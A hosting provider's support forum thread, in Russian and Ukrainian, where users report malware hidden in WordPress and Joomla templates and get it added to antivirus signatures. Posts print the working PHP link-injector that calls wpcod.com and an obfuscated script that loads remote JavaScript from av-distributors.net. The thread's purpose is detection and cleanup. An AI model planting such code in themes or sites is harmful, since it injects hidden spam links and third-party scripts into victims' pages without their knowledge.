• UAH
  • USD
  • RUB
  • EUR
  • +38(044) 392-74-33  Киев
  • +38(057) 728-39-00  Харьков
  • +38(056) 794-38-31  Днепр
  • +38(032) 229-58-93  Львов
  • +38(048) 738-57-70  Одесса
  • +38(093) 449-04-21  Life
  • +38(067) 400-88-44  Киевстар
  • +38(095) 630-90-82  MTC
  • +1(888)393-24-51  USA, Toll free
  • +44(131)507-01-14  Great Britain
  • +7(499) 348-28-61  Москва

Пожелания и предложения. Добавить в антивирус вредоносный код.

Форумы Пожелания и предложения Добавить в антивирус вредоносный код.
tod_m
29.09.2016
хостинг: есть
домен: есть
5
Добавить в антивирус вредоносный код.
Добрый день.

В процессе обслуживания сайтов обнаружил вредоносный код который заражает WordPress сайты.
Cудя по статьям в сети это часто встречающийся вредоносны код!
Предлагаю добавить его в ваш антивирус и помочь многим пользователям избавится от проблем.
Домен злоумышленников wpcod.com, их провайдеру уже выслана жалоба.
Ссылки с подтверждением вредоносности и код приведены ниже.

Код находится в function.php
class Get_links {

    var $host = 'wpcod.com';
    var $path = '/system.php';
    var $_socket_timeout    = 5;

    function get_remote() {
        $req_url = 'http://'.$_SERVER['HTTP_HOST'].urldecode($_SERVER['REQUEST_URI']);
        $_user_agent = "Mozilla/5.0 (compatible; Googlebot/2.1; ".$req_url.")";

        $links_class = new Get_links();
        $host = $links_class->host;
        $path = $links_class->path;
        $_socket_timeout = $links_class->_socket_timeout;
        //$_user_agent = $links_class->_user_agent;

        @ini_set('allow_url_fopen',          1);
        @ini_set('default_socket_timeout',   $_socket_timeout);
        @ini_set('user_agent', $_user_agent);

        if (function_exists('file_get_contents')) {
            $opts = array(
                'http'=>array(
                    'method'=>"GET",
                    'header'=>"Referer: {$req_url}\r\n".
                        "User-Agent: {$_user_agent}\r\n"
                )
            );
            $context = stream_context_create($opts);

            $data = @file_get_contents('http://' . $host . $path, false, $context);
            preg_match('/(\<\!--link--\>)(.*?)(\<\!--link--\>)/', $data, $data);
            $data = @$data[2];
            return $data;
        }
        return '<!--link error-->';
    }
}


и в footer.php
< ?php if ($user_ID) : ?>< ?php else : ?>
< ?php if (is_single() || is_page() ) { ?>
< ?php $lib_path = dirname(__FILE__).'/'; require_once('functions.php');
$links = new Get_links(); $links = $links->get_remote(); echo $links; ?>
< ?php } ?>
< ?php endif; ?>


Ссылки с жалобами на других сайтах:
Инструкция Левые ссылки в шаблонах. Осторожно с бесплатными шаблонами. - Бормотухи.НЕТ
Блог обычного человека: мысли, записи, мнения — Tarasevich.Info
Список рефспама | Valerevna.ru
Скрытые ссылки в шаблонах WP, Joomla, DLE | BestSkins.ru
s0639541902
29.09.2016
хостинг: есть
домен: есть
1
Да проблема существует и довольно распространена, за последний месяц у клиентов встречал такое двжады, причём во всех случаях вордпресс, и код 1 в 1 как у вас

во вложении скриншот кода + скриншот с сайта самих мудаков
Прикрепленные файлы:
alina03
29.09.2016
хостинг: нет
домен: нет
1
+1
У нас теж таке зустрічалося.
Прохання добавити його в антивірус, якщо є така можливість.
oleksandr.franko
29.09.2016
хостинг: есть
домен: есть
Это часто встречается в бесплатных шаблонах, не раз такое встречал.
Используют сайты жертв для черного сео либо для фишинга.
С таким нужно бороться!

В последней ссылке приведены еще 4 примера вредоносного кода. Их, я думаю, тоже стоить добавить в антивирус.
Скрытые ссылки в шаблонах WP, Joomla, DLE | BestSkins.ru
eugen
29.09.2016
хостинг: есть
домен: есть
2
Добавили тестовые сигнатуры, если что-то по ним найдется - завтра добавим в рабочий антивирус
tod_m
29.09.2016
хостинг: есть
домен: есть
Спасибо!

Сообщите, пожалуйста, о результатах.
eugen
29.09.2016
хостинг: есть
домен: есть
Да, напишу в этой теме. Завтра во второй половине дня будем знать
eugen
30.09.2016
хостинг: есть
домен: есть
3
По результатам оставили три новых сигнатуры. В 4% хостинг аккаунтов обнаружились темы с такими включениями. Больше всего с подгрузкой ссылок с wpconfig .net
tod_m
30.09.2016
хостинг: есть
домен: есть
Спасибо за информацию.

Будете добавлять в антивирус?
eugen
30.09.2016
хостинг: есть
домен: есть
Да, сейчас при сканировании аккаунта уже будут находиться темы с такими включениями
Илья
30.09.2016
хостинг: есть
домен: есть
1
В процессе обслуживания сайтов обнаружил вредоносный код который заражает WordPress сайты.
Cудя по статьям в сети это часто встречающийся вредоносны код!
© tod_m

Спасибо автору статьи за подробно описанную проблему с вирусом. Благодаря чему была добавлена новая сигнатура в антивирус.
tod_m
30.09.2016
хостинг: есть
домен: есть
Вам спасибо за понимание и оперативность!
ppomobil
01.10.2016
хостинг: есть
домен: есть
Спасибо за информацию, в footer в свое время удалил эту гадость, потому как лезла ссылка, а вот в functions не додумался залезть, сегодня пришло письмо с предупреждением.
tod_m
01.10.2016
хостинг: есть
домен: есть
Сайты с которых эти ссылки загружаются и с которых продаются находятся на freehost.
29-ого написали им жалобу. Они ответили, что запросили информацию у клиента.

Кстати, у меня в акаунте нашло 4 зараженных сайта!
Но больше всего удивило то, что вредоносный код нашло на сайте который устанавливали в 2012 году!
Выходит они уже больше четырех лет распространяют зараженные темы на ВП.
oales00
02.10.2016
хостинг: есть
домен: есть
як його видалити??
s0639541902
02.10.2016
хостинг: есть
домен: есть
1
Если вы более или менее разбираетесь в вебе, то можете скачать проект и через допустим total commander или же
PhpStorm попробовать найти фрагменты кода приведённого в первом посте, (Если же вам об этом сообщил антивирус хостинга Украина, то там наверно есть указание на файл с вредоносным кодом.) Далее просто заходите в файл и удаляете фрагмент, а так же место где он объявляется, всё это описано в первом сообщении.
Если же у вас не желания самостоятельно удалить вредоносный код, можете обратиться к специалистам, думаю найти людей подходящего уровня не составит труда.

пс. Если хотите мы вам предоставим своего специалиста ( support@ubs.com.ua ) туда пишите сколько сайтов нужно почистить там уже договоримся.
fuzz1k
02.10.2016
хостинг: нет
домен: нет
а у меня нет такого кода.как так?
tod_m
02.10.2016
хостинг: есть
домен: есть
а у меня нет такого кода.как так? © fuzz1k

А почему Вы решили, что он у Вас должен быть?
fuzz1k
09.10.2016
хостинг: нет
домен: нет

а у меня нет такого кода.как так? © fuzz1k
А почему Вы решили, что он у Вас должен быть?
© tod_m


есть он в function.php , я думал на моем сайте смотреть нужно. подскажите как его удалить? выделить и shift del ? так он не удаляется почему то
Евгений В.
09.10.2016
хостинг: есть
домен: нет
подскажите как его удалить? выделить и shift del ? так он не удаляется почему то © fuzz1k

Это делается через "Хостинг" -- "Файл-менеджер", открыть папку с файлом, правой кнопкой мыши по файлу, пункт "Редактировать". Дальше - как в обычном текстовом редакторе все.
eley11
15.10.2016
хостинг: есть
домен: есть
-2
Простите, я не понял, а как удалять этот код? Написано много, а толку от статьи нет. И админы ещё предлагают данную тему для знакомства. Должны в верху темы, красным цветом, крупным шрифтом описать метод удаления.
Илья
15.10.2016
хостинг: есть
домен: есть
Простите, я не понял, а как удалять этот код? © eley11

Попробуйте удалить все куски и класс Get_links и те строки, которые приведены в начале темы в footer.
Предварительно сделайте резервную копию файлов.
joli.ru
16.10.2016
хостинг: есть
домен: есть
Подскажите пожалуйста нашла и удалила код из первого сообщения и появилась ошибка Parse error: syntax error, unexpected '}' in /home/meblisos/mebli-sos.zp.ua/www/wp-content/themes/craftsman_wp_theme/functions.php on line 580
я так понимаю лишний знак '}'? или наоборот не хватает? убирала и вставляла их и так и сяк все равно...
tod_m
16.10.2016
хостинг: есть
домен: есть
я так понимаю лишний знак '}'? или наоборот не хватает? убирала и вставляла их и так и сяк все равно... © joli.ru

Приложите файл во вложении.
Посмотрим.
joli.ru
16.10.2016
хостинг: есть
домен: есть
вот исходный не исправленный
Прикрепленные файлы:
tod_m
16.10.2016
хостинг: есть
домен: есть
Исправил.
Во вложении.
Прикрепленные файлы:
joli.ru
16.10.2016
хостинг: есть
домен: есть
1
спасибо огромное, заменила - всё работает!))
prokopchuk.m
19.10.2016
хостинг: есть
домен: есть
2
Здравствуйте, а вот код который каждый день удаляю из сайтов на Joomla:

<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://av-distributors.net/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'I92930' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>

Находится он в файле index.php шаблона.
dotern
20.10.2016
хостинг: есть
домен: есть
Здравствуйте, а вот код который каждый день удаляю из сайтов на Joomla: © prokopchuk.m


Вы, наверное, скачиваете шаблоны зараженные
tod_m
20.10.2016
хостинг: есть
домен: есть
Вы, наверное, скачиваете шаблоны зараженные
© misha_into


Насколько я заметил по вордпресу, все бесплатные шаблоны которые не из официального репозитория - заражены.
Для этого мы и подняли эту тему, что б выявить и добавить в антивирус все известные сигнатуры вирусов.
Большенство пользователей даже не догадывается что в шаблоне может быть вирус.
dotern
20.10.2016
хостинг: есть
домен: есть
Там как правило не вирус, а вставленная ссылка другого сайта с целью поднятия тиц и pr
tod_m
20.10.2016
хостинг: есть
домен: есть
Там не просто ссылка, а функционал подгрузки ссылок с сервиса по черному СЕО.
Они их у себя на сайте продают и без ведома пользователя размещают на сайте.
dotern
20.10.2016
хостинг: есть
домен: есть
Не приятная штука. Может есть какие-то характерные признаки такого кода. Можно описать здесь инструкцию как выявлять такой код в шаблоне.
tod_m
20.10.2016
хостинг: есть
домен: есть
Может есть какие-то характерные признаки такого кода. © misha_into


Если есть примеры вредоносного кода то пишите их здесь, тех. поддержка хостинга рассмотрит их и если они актуальны - добавит в антивирус.
prokopchuk.m
22.10.2016
хостинг: есть
домен: есть
Вы, наверное, скачиваете шаблоны зараженные © misha_into

Некоторым сайтам более 2-х лет и до этого времени проблем не было, шаблоны абсолютно разные от стандартных (чистые типа протостар, но модифицировано мной) до студийных платных шаблонов.
s0639541902
24.10.2016
хостинг: есть
домен: есть
1
<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://av-distributors.net/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'I92930' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>


Вопрос такой, prokopchuk.m показал до этого сигнатуру приведённую выше, вопрос к администрации хостинга, будут ли проверять хостинг на её наличие, или нужно создать отдельную тему?
Дмитрий Б.
28.10.2016
хостинг: есть
домен: нет
Здравствуйте, а вот код который каждый день удаляю из сайтов на Joomla: © prokopchuk.m

Как я понимаю удаление этого кода ситуацию не исправляет. Т.е. надо искать чем и как он добавляется и в вирусную базу заносить уже причину, а не следствие. Мало кому понравится получать каждый день от антивируса одни и те же сообщения.
s0639541902
28.10.2016
хостинг: есть
домен: есть
Как я понимаю удаление этого кода ситуацию не исправляет. Т.е. надо искать чем и как он добавляется и в вирусную базу заносить уже причину, а не следствие. Мало кому понравится получать каждый день от антивируса одни и те же сообщения. © Дмитрий Б.


Причиной является распространение бесплатных шаблонов, заражённых вирусами, делается это специально, цели тоже вполне понятны : Организация чёрных бирж ссылок, фишинг, кража данных,мошенничество с банковскими картами, шантаж и многое другое.
prokopchuk.m
28.10.2016
хостинг: есть
домен: есть
Причиной является распространение бесплатных шаблонов © s0639541902

Повторюсь, это относится и до студийных платных шаблонов.
s0639541902
28.10.2016
хостинг: есть
домен: есть
Это довольно странно читать, учитывая что многие студии делают свои шаблоны на основе бесплатных, и платные шаблоны не исключение, причём никто не гарантирует вам добросовестность их работы.
Участвовать в общении на этом форуме могут только
зарегистрированные пользователи.

Если вы уже зарегистрированы Вам необходимо войти на форум.

Горячая линия
(044)
392 74 33
другие города